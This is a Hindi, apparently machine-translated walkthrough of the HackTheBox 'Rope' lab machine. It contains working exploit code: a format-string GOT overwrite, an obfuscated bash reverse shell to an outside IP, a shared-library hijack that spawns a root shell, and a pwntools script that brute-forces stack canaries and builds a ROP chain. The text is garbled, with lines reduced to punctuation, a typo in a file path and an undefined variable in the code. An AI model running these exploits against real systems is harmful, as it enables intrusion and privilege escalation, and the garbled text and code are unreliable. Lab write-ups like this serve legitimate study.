😥 👩🏽‍💼 🏚️ बॉक्स को हैक करें। वॉकथ्रू रोप। PWN। स्वरूपण और ROP pwntools का उपयोग कर 🧥 🍿 🐥

मैं HackTheBox साइट से आगे की प्रक्रिया के लिए भेजे गए समाधान प्रकाशित करना जारी रखता हूं ।

इस लेख में, हम कई pwn एकत्र करते हैं, जिन्हें हम pwntools का उपयोग करके हल करेंगे। मुझे लगता है कि इस विषय में जागरूकता के किसी भी स्तर के साथ पाठकों के लिए उपयोगी होगा। चलो चलते हैं ...

प्रयोगशाला के लिए कनेक्शन वीपीएन के माध्यम से है। यह सलाह दी जाती है कि किसी कार्य कंप्यूटर से या किसी होस्ट से कनेक्ट न करें जहां आपके लिए महत्वपूर्ण डेटा उपलब्ध है, जैसा कि आप निजी नेटवर्क पर उन लोगों के साथ समाप्त होते हैं जो सूचना सुरक्षा के क्षेत्र में कुछ जानते हैं :)

संगठनात्मक जानकारी

, , Telegram . , , .

. , - , .

टोह

इस मशीन का आईपी एड्रेस 10.10.10.148 है, जिसे मैं / etc / मेजबानों में जोड़ता हूँ।

10.10.10.148    rope.htb

सबसे पहले, हम खुले बंदरगाहों को स्कैन करते हैं। चूंकि नैम्प के साथ सभी बंदरगाहों को स्कैन करने में लंबा समय लगता है, इसलिए मैं इसे पहले मैसकैन के साथ करूंगा। हम प्रति सेकंड 500 पैकेट की गति से tun0 इंटरफ़ेस से सभी टीसीपी और यूडीपी पोर्ट को स्कैन करते हैं।

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.148 --rate=500

अब, बंदरगाहों पर काम करने वाली सेवाओं के बारे में अधिक विस्तृत जानकारी के लिए, हम -ए विकल्प के साथ एक स्कैन चलाएंगे।

nmap -A rope.htb -p22,9999

होस्ट SSH और एक वेब सर्वर चलाता है। हम वेब पर जाएंगे और हमें एक प्राधिकरण फ़ॉर्म द्वारा पूरा किया जाएगा।

डायरेक्टरी स्कैन देखने पर, हमें एक इंडेक्सेड डायरेक्टरी / (http: //rope.htb: 9999 //) मिलती है।

और निर्देशिका / ऑप्ट / www में हम निष्पादन योग्य फ़ाइल ढूंढते हैं - यह हमारा वेब सर्वर है।

HTTPserver PWN

इसे डाउनलोड करें और देखें कि चेकसेक के साथ क्या सुरक्षा है।

इस प्रकार, हमारे पास सभी सक्रिय सुरक्षा के साथ एक 32-बिट अनुप्रयोग है, अर्थात्:

NX (not execute) — , , , ( ) , , , . .
ASLR: (libc), libc. ret2libc.
PIE: , ASLR, , . .
Canary: , , . , . .

इस तथ्य के कारण कि हम सर्वर पर फ़ाइलों को पढ़ सकते हैं, हम इस निष्पादन योग्य फ़ाइल के प्रक्रिया मानचित्र को पढ़ सकते हैं। यह हमें निम्नलिखित प्रश्नों का उत्तर देगा:

प्रोग्राम किस पते पर डाउनलोड किया जाता है?
और किस पते पर उसके द्वारा इस्तेमाल किए गए पुस्तकालय हैं?

चलो करते हैं।

curl "http://rope.htb:9999//proc/self/maps" -H 'Range: bytes=0-100000'

इस प्रकार, हमारे पास दो पते हैं: 0x56558000 और f7ddc000। उसी समय, हम उपयोग किए गए libc लाइब्रेरी के लिए पथ प्राप्त करते हैं, इसे भी डाउनलोड करते हैं। अब पाया गया सब कुछ ध्यान में रखते हुए, हम एक शोषण टेम्पलेट बनाएंगे।

from pwn import *
import urllib
import base64

host = 'rope.htb'
port = 9999

context.arch = 'i386'
binary= ELF('./httpserver')
libc = ELF('./libc-2.27.so')
bin_base = 0x56558000 
libc_base = 0xf7ddc000

अब आप के लिए एक disassembler सुविधाजनक (एक decompiler के साथ) में विश्लेषण के लिए फ़ाइल ही खोलें। मैं प्लगइन्स का एक गुच्छा के साथ आईडीए का उपयोग करता हूं, और एक गहन विश्लेषण के लिए बैठने से पहले, मैं हर उस चीज को देखना पसंद करता हूं जिसे मैं साबित प्लगइन्स एकत्र कर सकता हूं। ऐसे कई लोगों में से एक है लेजीडा । और क्वेरी "स्कैन प्रारूप स्ट्रिंग वॉन" के लिए हमें संभावित रूप से कमजोर कार्यों के साथ एक प्लेट मिलती है।

इस प्लगइन का उपयोग करने के अनुभव से, मैंने तुरंत दूसरी पंक्ति (इसके प्रारूप पैरामीटर) पर ध्यान आकर्षित किया। हम इस फ़ंक्शन के उपयोग की जगह से गुजरते हैं और इसे विघटित करते हैं।

और अनुमानों की पुष्टि की जाती है, लाइन को बस प्रिंटफ फ़ंक्शन में पास किया जाता है। आइए जानें यह स्ट्रिंग क्या है। कॉल के स्थान पर log_access फ़ंक्शन पर जाएं।

तो हम तीसरे पैरामीटर में रुचि रखते हैं, जो फ़ाइल के रूप में आईडीए को चिह्नित कर रहा था। और हमें इस चर के क्रॉस-रेफरेंस को देखकर ही सभी सवालों के जवाब मिलते हैं।

इस प्रकार, यह स्ट्रिंग के लिए एक संकेतक है - फ़ाइल का नाम जो पढ़ने के लिए खोला गया है। चूंकि यह चर parse_request () फ़ंक्शन को निष्पादित करने का परिणाम है, फ़ाइल पढ़ने के लिए खोली गई है, और संपूर्ण प्रोग्राम एक वेब सर्वर है, हम मान सकते हैं कि यह सर्वर पर अनुरोधित पृष्ठ है।

curl http://127.0.0.1:9999/qwerty

आइए प्रारूप स्ट्रिंग भेद्यता की जांच करें।

curl http://127.0.0.1:9999/$(python -c 'print("AAAA"+"%25p"*100)')

ठीक! आइए ऑफसेट को परिभाषित करते हैं (आउटपुट के अंत में 0x41414141 - AAAA प्राप्त करने के लिए कितने% p विनिर्देशक भेजने की आवश्यकता है)।

हमें 53 मिलते हैं। जांचें कि सब कुछ सही है।

curl http://127.0.0.1:9999/$(python -c 'print("AAAA"+"%25p"*53)')

हमें एक स्थानीय शेल नहीं मिल सकता है, लेकिन हम एक कमांड निष्पादित कर सकते हैं, उदाहरण के लिए, एक रिवर्स शेल फेंकें:

bash -i >& /dev/tcp/10.10.15.60/4321 0>&1

लेकिन किसी भी असहज चरित्र से बचने के लिए, हम इसे बेस 64 में एन्कोड करेंगे, फिर शेल कॉल इस तरह दिखेगा:

echo “YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS42MC80MzIxIDA+JjEK” | base64 -d | bash -i

और अंत में, सभी रिक्त स्थान को $ IFS निर्माण के साथ बदलें। हमें वह कमांड मिलती है जिसे आपको बैक कनेक्ट करने के लिए निष्पादित करने की आवश्यकता होती है।

echo$IFS"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS42MC80MzIxIDA+JjEK"|base64$IFS-d|bash$IFS-i

आइए इसे कोड में जोड़ें:

offset = 53
cmd = 'bash -i >& /dev/tcp/10.10.15.60/4321 0>&1'
shell = 'echo$IFS"{}"|base64$IFS-d|bash$IFS-i'.format(base64.b64encode(cmd))

अब हमारे स्वरूप स्ट्रिंग पर वापस जाएँ। चूंकि पुटफ को प्रिंटफ () के बाद कहा जाता है, हम जीओटी में इसके पते को लिबेक से सिस्टम फ़ंक्शन के पते पर फिर से लिख सकते हैं। Pwntools के लिए धन्यवाद, यह करना बहुत आसान है। मान लें कि आप बाइनरी फ़ंक्शन का उपयोग करके रिश्तेदार के पते को पा सकते हैं। ['पुट्स'], सिस्टम के साथ भी आसानी से: libc.symbols ['system'] फ़ंक्शन। प्रारूप लाइनों और GOT के बारे में मैंने pwn के बारे में लेखों में विस्तार से वर्णन किया है, इसलिए यहां हम बस pwntools का उपयोग करके प्रारूप रेखा एकत्र करते हैं:

writes = {(elf_base + binary.got['puts']): (libc_base + libc.symbols['system'])}
format_string = fmtstr_payload(offset, writes)

हम अंतिम पेलोड एकत्र करते हैं:

payload = shell + " /" + urllib.quote(format_string) + "\n\n"

हम कनेक्ट और भेजते हैं:

p = remote(host,port)
p.send(payload)
p.close()

पूरा कोड इस तरह दिखता है।

आइए कोड को निष्पादित करें और बैककनेक्ट प्राप्त करें।

उपयोगकर्ता

चलो पासवर्ड के बिना कमांड निष्पादित करने के लिए sudo सेटिंग्स की जांच करते हैं।

और हम देखते हैं कि आप उपयोगकर्ता r4j की ओर से रीडलॉग निष्पादित कर सकते हैं। आवेदन में कोई भेद्यता नहीं है, GTFOBins भी अनुपस्थित हैं। आइए देखें कि एप्लिकेशन द्वारा उपयोग किए जाने वाले पुस्तकालय।

ls -l /lib/x86_64-linux-gnu/ | grep "liblog.so\|libc.so.6"

यही है, हम इन फ़ाइलों को लिख सकते हैं। चलो हमारी लाइब्रेरी लिखो।

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>

void printlog(){
    setuid(0);
    setgid(0);
    system("/bin/sh");
}

अब इसे संकलित करें।

gcc -c -Wall -Werror -fpic liblog.c

और पुस्तकालय इकट्ठा।

Gcc -shared -o liblog.so liblog.o

फिर हम फ़ाइल को होस्ट पर अपलोड करते हैं, लाइब्रेरी को ओवरराइट करते हैं और प्रोग्राम को निष्पादित करते हैं।

तो हम उपयोगकर्ता लेते हैं।

जड़

सिस्टम को सूचीबद्ध करने के लिए हम अलसी का उपयोग करते हैं।

इसलिए लोकलहोस्ट पर, पोर्ट 1337 सुन रहा है।

जैसा कि आप देख सकते हैं, हमारा उपयोगकर्ता प्रवेश समूह का सदस्य है। आइए इस समूह के लिए उपलब्ध फाइलों पर एक नजर डालें।

एक दिलचस्प फाइल है। और यह वह प्रोग्राम है जो पोर्ट पर सुनता है।

इस स्थिति में, अनुप्रयोग रूट के रूप में चलता है।

एप्लिकेशन और स्वयं उपयोग की जाने वाली लायब्रेरी को डाउनलोड करें। और ध्यान दें कि एएसएलआर मेजबान पर सक्रिय है।

जांचें कि आवेदन में क्या सुरक्षा है।

सभी को अधिकतम यही है, अगर हम एक बफर अतिप्रवाह पाते हैं, तो हमें कैनरी (मान को बफर की अखंडता की जांच करने के लिए फ़ंक्शन से बाहर निकलने से पहले जांच की जाती है) को भंग करने की आवश्यकता होगी, और भेद्यता के दोहन के लिए एक तकनीक के रूप में, हम आरओपी का उपयोग करेंगे (जिसके बारे में मैंने कुछ विस्तार से लिखा था)यहाँ )। आइए किसी भी डिस्मेम्बलर के साथ प्रोग्राम को खोलें जो कि आपके लिए सुविधाजनक है (मैं आईडीए प्रो का उपयोग करता हूं)। हम मुख्य फ़ंक्शन को मुख्य रूप से विघटित करते हैं।

कैनरी का एक उदाहरण चर v10 है, जो एक फ़ंक्शन की शुरुआत में सेट किया गया है। आइए देखें कि सब_1267 फ़ंक्शन किसके लिए जिम्मेदार है।

तो यहां हम सुनने के लिए पोर्ट खोलते हैं। आप इसका नाम बदलकर is_listen () कर सकते हैं; हम और आगे बढ़ते हैं। निम्नलिखित उपयोगकर्ता-परिभाषित फ़ंक्शन sub_14EE है।

भेजने से पहले, एक अन्य उपयोगकर्ता फ़ंक्शन है। हम उसकी तरफ देखते हैं।

इस प्रकार, इस फ़ंक्शन में, 0x400 बाइट तक की एक स्ट्रिंग प्राप्त की जाती है और बफर को लिखा जाता है। Buf वैरिएबल पर टिप्पणी मौजूदा स्टैक फ्रेम (आरबीपी) के आधार के सापेक्ष पते को इंगित करती है - [rbp-40h], और वेरिएबल v3 (कैनरी) का एक रिश्तेदार पता [rbp-8h] है, इसलिए बफर ओवरफ्लो के लिए हमें अधिक [rbp- की आवश्यकता है] 8h] - [rbp-40h] = 0x40-8 = 56 बाइट्स।

इस प्रकार, योजना इस प्रकार है:

बफ़र ढूंढें और ओवरफ़्लो करें;
कैनरी, आरबीपी और चीर नीचे रखो;
चूंकि पाई सक्रिय है, आपको वास्तविक ऑफसेट खोजने की आवश्यकता है;
उस पते की गणना करने के लिए एक स्मृति रिसाव ढूंढें जिस पर पुस्तकालय लोड है;
आरओपी लीजिए, जिसमें मानक डिस्क्रिप्टर की धारा को प्रोग्राम के नेटवर्क डिस्क्रिप्टर पर पुनर्निर्देशित किया जाएगा, और फिर सिस्टम फ़ंक्शन के माध्यम से कॉल / बिन / श।

1. बफर अतिप्रवाह

जैसा कि नीचे देखा जा सकता है, जब 56 बाइट्स ट्रांसमिट करते हैं, तो प्रोग्राम सामान्य रूप से काम करना जारी रखता है, लेकिन 57 बाइट्स ट्रांसमिट करते हुए, हमें एक अपवाद मिलता है। इस प्रकार, बफर की अखंडता का उल्लंघन किया जाता है।

चलो एक शोषण टेम्पलेट बनाते हैं। चूँकि इसके माध्यम से छाँटना और फिर से जोड़ना आवश्यक होगा, इसलिए हम pwntools (log_level) संदेशों के आउटपुट को अक्षम कर देंगे।

#!/usr/bin/python3
from pwn import *

HOST = '127.0.0.1'
PORT = 1337
context(os = "linux", arch = "amd64", log_level='error')

pre_payload = "A" * 56

r = remote(HOST, PORT)

context.log_level='info'
r.interactive()

2. करारी, आरबीपी, आरआईपी

जैसा कि हमने पता लगाया, बफर के 56 बाइट्स के बाद एक कैनरी है, और इसके बाद स्टैक पर आरबीपी और आरआईपी पते हैं, जिन्हें भी हल करना होगा। एक 8 बाइट मैचिंग फंक्शन लिखते हैं।

def qword_brute(pre_payload, item):
    qword_ = b""
    while len(qword_) < 8:
        for b in range(256):
            byte = bytes([b])
            try:
                r = remote(HOST, PORT)
                print(f"{item} find: {(qword_ + byte).hex()}", end=u"\u001b[1000D")
                send_ = pre_payload + qword_ + byte
                r.sendafter(b"admin:", send_)
                if b"Done" not in r.recvall(timeout=5):
                    raise EOFError
                r.close()
                qword_ += byte
                break
            except EOFError as error:
                r.close()
    context.log_level='info'            
    log.success(f"{item} found: {hex(u64(qword_))}")
    context.log_level='error' 
    return qword_

तो हम pre_payload लिख सकते हैं:

pre_payload = b"A" * 56
CANARY = qword_brute(pre_payload, "CANARY")
pre_payload += CANARY
RBP = qword_brute(pre_payload, "RBP")
pre_payload += RBP
RIP = qword_brute(pre_payload, "RIP")

3.PIE

अब हम PIE से निपटते हैं। हमने RIP पाया - यह वह वापसी पता है जहाँ हम फ़ंक्शन से लौटते हैं। इस प्रकार, हम इसे कोड में रिटर्न एड्रेस से घटा सकते हैं।

इस प्रकार, आधार से ऑफसेट 0x1562 है। चलिए एप्लिकेशन के वास्तविक पते का संकेत देते हैं।

base_binary = u64(RIP) - 0x1562
binary = ELF('./contact')
binary.address = base_binary
libc = ELF('./libc.so.6')

4. स्मृति रिसाव

प्रॉम्प्ट स्ट्रिंग को प्रदर्शित करने के लिए एप्लिकेशन मानक राइट () फ़ंक्शन का उपयोग करता है, जो आउटपुट, एक बफर और इसके आकार को संभालता है। हम इस फ़ंक्शन का उपयोग कर सकते हैं।

सुविधा के लिए, आइए pwntools से ROP मॉड्यूल का उपयोग करें। संक्षेप में, यह कैसे और क्यों नीचे दी गई छवि में प्रस्तुत किया गया है।

चलो एक रिसाव मिलता है, इससे हमें पता चल जाएगा कि लोड किए गए परिवाद पुस्तकालय में लेखन समारोह क्या है।

rop_binary = ROP(binary)
rop_binary.write(0x4, binary.got['write'], 0x8)
send_leak = pre_payload + flat(rop_binary.build())

r = remote(HOST, PORT)
r.sendafter(b"admin:", send_leak)
leak = r.recvall().strip().ljust(8, b'\x00')
print(f"Leak: {hex(u64(leak))}")
base_libc = leak - libc.symbols['write']

5.ROP

आइए, libc लाइब्रेरी का आधार पता बदलें और लाइन / बिन / श का पता लगाएं।

libc.address = base_libc
shell_address = next(libc.search(b"/bin/sh\x00"))

यह आरओपी को इकट्ठा करने के लिए बना हुआ है, जिसमें मानक I / O विवरणकर्ता (0,1,2) को प्रोग्राम (4) में पंजीकृत वर्णनकर्ता पर पुनर्निर्देशित किया जाएगा। जिसके बाद सिस्टम फ़ंक्शन को बुलाया जाएगा, जहां हम लाइन / बिन / श के पते को पास करेंगे।

rop_libc = ROP(libc)
rop_libc.dup2(4, 0)
rop_libc.dup2(4, 1)
rop_libc.dup2(4, 2)
rop_libc.system(shell_address)

payload = pre_payload + flat(rop_libc.build())

r = remote(HOST, PORT)
r.sendafter(b"admin:", payload)
time.sleep(2)
r.sendline(b"id")

6. ऑपरेशन
पूर्ण शोषण कोड।

अब सर्वर पर, ssh कुंजी को फाइल /home/r4j/.ssh/authorizef_keys पर लिखें।

और पोर्ट को अग्रेषित करें (सुनिश्चित करें कि स्थानीय पोर्ट 1337 से कनेक्शन को SSH के माध्यम से दूरस्थ होस्ट के पोर्ट 1337 पर पुनर्निर्देशित किया गया है)।

ssh -L 1337:127.0.0.1:1337 -i id_rsa r4j@rope.htb

और शोषण को लॉन्च करें।

हम जड़ के नीचे काम करते हैं।

आप हमसे टेलीग्राम पर जुड़ सकते हैं । वहां आप दिलचस्प सामग्री, मर्ज किए गए पाठ्यक्रम, साथ ही सॉफ़्टवेयर पा सकते हैं। आइए एक समुदाय को एक साथ रखें जिसमें ऐसे लोग होंगे जो आईटी के कई क्षेत्रों में पारंगत हैं, फिर हम हमेशा किसी भी आईटी और सूचना सुरक्षा मुद्दों पर एक दूसरे की मदद कर सकते हैं।

बॉक्स को हैक करें। वॉकथ्रू रोप। PWN। स्वरूपण और ROP pwntools का उपयोग कर

टोह